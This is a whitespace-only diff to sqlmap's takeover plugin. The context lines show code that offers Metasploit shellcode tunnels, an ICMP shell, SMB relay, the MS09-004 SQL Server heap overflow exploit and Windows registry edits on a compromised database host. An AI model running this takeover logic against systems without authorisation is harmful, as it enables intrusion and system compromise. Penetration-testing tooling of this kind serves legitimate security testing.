+19,12 @@ class Syntax: @staticmethod def unescape(expression, quote=True): - errMsg = "'unescape' method must be defined " + errMsg = "'unescape' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg @staticmethod def escape(expression): - errMsg = "'escape' method must be defined " + errMsg = "'escape' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index 68a2ac0f5..7bbe33cbf 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -52,7 +52,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): web = True else: - errMsg = "unable to execute operating system commands via " + errMsg = "unable to execute operating system commands via " errMsg += "the back-end DBMS" raise sqlmapNotVulnerableException(errMsg) @@ -73,7 +73,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): web = True else: - errMsg = "unable to prompt for an interactive operating " + errMsg = "unable to prompt for an interactive operating " errMsg += "system shell via the back-end DBMS because " errMsg += "stacked queries SQL injection is not supported" raise sqlmapNotVulnerableException(errMsg) @@ -91,7 +91,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): self.checkDbmsOs() - msg = "how do you want to establish the tunnel?" + msg = "how do you want to establish the tunnel?" msg += "\n[1] TCP: Metasploit Framework (default)" if Backend.isOs(OS.WINDOWS): @@ -129,7 +129,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): isAdmin = runningAsAdmin() if isAdmin is not True: - errMsg = "you need to run sqlmap as an administrator " + errMsg = "you need to run sqlmap as an administrator " errMsg += "if you want to establish an out-of-band ICMP " errMsg += "tunnel because icmpsh uses raw sockets to " errMsg += "sniff and craft ICMP packets" @@ -139,7 +139,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): from impacket import ImpactDecoder from impacket import ImpactPacket except ImportError, _: - errMsg = "sqlmap requires 'impacket' third-party library " + errMsg = "sqlmap requires 'impacket' third-party library " errMsg += "in order to run icmpsh master. Download from " errMsg += "http://oss.coresecurity.com/projects/impacket.html" raise sqlmapMissingDependence, errMsg @@ -170,7 +170,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): if tunnel == 1: if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ): - msg = "how do you want to execute the Metasploit shellcode " + msg = "how do you want to execute the Metasploit shellcode " msg += "on the back-end database underlying operating system?" msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)" msg += "\n[2] Via shellcodeexec (file system way)" @@ -202,7 +202,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): if Backend.isOs(OS.WINDOWS) and conf.privEsc: if Backend.getIdentifiedDbms() == DBMS.MYSQL: - debugMsg = "by default MySQL on Windows runs as SYSTEM " + debugMsg = "by default MySQL on Windows runs as SYSTEM " debugMsg += "user, no need to privilege escalate" logger.debug(debugMsg) @@ -211,7 +211,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): # system is not Windows conf.privEsc = False - warnMsg = "sqlmap does not implement any operating system " + warnMsg = "sqlmap does not implement any operating system " warnMsg += "user privilege escalation technique when the " warnMsg += "back-end DBMS underlying system is not Windows" logger.warn(warnMsg) @@ -233,7 +233,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): # system is not Windows conf.privEsc = False - warnMsg = "sqlmap does not implement any operating system " + warnMsg = "sqlmap does not implement any operating system " warnMsg += "user privilege escalation technique when the " warnMsg += "back-end DBMS underlying system is not Windows" logger.warn(warnMsg) @@ -262,26 +262,26 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): self.checkDbmsOs() if not Backend.isOs(OS.WINDOWS): - errMsg = "the back-end DBMS underlying operating system is " + errMsg = "the back-end DBMS underlying operating system is " errMsg += "not Windows: it is not possible to perform the SMB " errMsg += "relay attack" raise sqlmapUnsupportedDBMSException(errMsg) if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: if Backend.getIdentifiedDbms() in ( DBMS.PGSQL, DBMS.MSSQL ): - errMsg = "on this back-end DBMS it is only possible to " + errMsg = "on this back-end DBMS it is only possible to " errMsg += "perform the SMB relay attack if stacked " errMsg += "queries are supported" raise sqlmapUnsupportedDBMSException(errMsg) elif Backend.getIdentifiedDbms() == DBMS.MYSQL: - debugMsg = "since stacked queries are not supported, " + debugMsg = "since stacked queries are not supported, " debugMsg += "sqlmap is going to perform the SMB relay " debugMsg += "attack via inference blind SQL injection" logger.debug(debugMsg) printWarn = True - warnMsg = "it is unlikely that this attack will be successful " + warnMsg = "it is unlikely that this attack will be successful " if Backend.getIdentifiedDbms() == DBMS.MYSQL: warnMsg += "because by default MySQL on Windows runs as " @@ -313,13 +313,13 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): return if not Backend.getIdentifiedDbms() == DBMS.MSSQL or not Backend.isVersionWithin(("2000", "2005")): - errMsg = "the back-end DBMS must be Microsoft SQL Server " + errMsg = "the back-end DBMS must be Microsoft SQL Server " errMsg += "2000 or 2005 to be able to exploit the heap-based " errMsg += "buffer overflow in the 'sp_replwritetovarbin' " errMsg += "stored procedure (MS09-004)" raise sqlmapUnsupportedDBMSException(errMsg) - infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion() + infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion() infoMsg += "'sp_replwritetovarbin' stored procedure heap-based " infoMsg += "buffer overflow (MS09-004)" logger.info(infoMsg) @@ -330,7 +330,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): self.bof() def uncPathRequest(self): - errMsg = "'uncPathRequest' method must be defined " + errMsg = "'uncPathRequest' method must be defined " errMsg += "into the specific DBMS plugin" raise sqlmapUndefinedMethod, errMsg @@ -341,7 +341,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): self.checkDbmsOs() if not Backend.isOs(OS.WINDOWS): - errMsg = "the back-end DBMS underlying operating system is " + errMsg = "the back-end DBMS underlying operating system is " errMsg += "not Windows" raise sqlmapUnsupportedDBMSException(errMsg) @@ -353,15 +353,15 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): if not conf.regKey: default = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" - msg = "which registry key do you want to read? [%s] " % default - regKey = readInput(msg, default=default) + msg = "which registry key do you want to read? [%s] " % default + regKey = readInput(msg, default=default) else: regKey = conf.regKey if not conf.regVal: default = "ProductName" - msg = "which registry key value do you want to read? [%s] " % default - regVal = readInput(msg, default=default) + msg = "which registry key value do you want to read? [%s] " % default + regVal = readInput(msg, default=default) else: regVal = conf.regVal @@ -376,7 +376,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): errMsg = "missing mandatory option" if not conf.regKey: - msg = "which registry key do you want to write? " + msg = "which registry key do you want to write? " regKey = readInput(msg) if not regKey: @@ -385,7 +385,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): regKey = conf.regKey if not conf.regVal: - msg = "which registry key value do you want to write? " + msg = "which registry key value do you want to write? " regVal = readInput(msg) if not regVal: @@ -394,7 +394,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): regVal = conf.regVal if not conf.regData: - msg = "which registry key value data do you want to write? " + msg = "which registry key value data do you want to write? " regData = readInput(msg) if not regData: @@ -404,13 +404,13 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): if not conf.regType: default = "REG_SZ" - msg = "which registry key value data-type is it? " - msg += "[%s] " % default + msg = "which registry key value data-type is it? " + msg += "[%s] " % default regType = readInput(msg, default=default) else: regType = conf.regType - infoMsg = "adding Windows registry path '%s\%s' " % (regKey, regVal) + infoMsg = "adding Windows registry path '%s\%s' " % (regKey, regVal) infoMsg += "with data '%s'. " % regData infoMsg += "This will work only if the user running the database " infoMsg += "process has privileges to modify the Windows registry." @@ -424,7 +424,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): errMsg = "missing mandatory option" if not conf.regKey: - msg = "which registry key do you want to delete? " + msg = "which registry key do you want to delete? " regKey = readInput(msg) if not regKey: @@ -433,7 +433,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): regKey = conf.regKey if not conf.regVal: - msg = "which registry key value do you want to delete? " + msg = "which registry key value do you want to delete? " regVal = readInput(msg) if not regVal: @@ -441,14 +441,14 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): else: regVal = conf.regVal - message = "are you sure that you want to delete the Windows " + message = "are you sure that you want to delete the Windows " message += "registry path '%s\%s? [y/N] " % (regKey, regVal) - output = readInput(message, default="N") + output = readInput(message, default="N") if output and output[0] not in ( "Y", "y" ): return - infoMsg = "deleting Windows registry path '%s\%s'. " % (regKey, regVal) + infoMsg = "deleting Windows registry path '%s\%s'. " % (regKey, regVal) infoMsg += "This will work only if the user running the database " infoMsg += "process has privileges to modify the Windows registry." logger.info(infoMsg)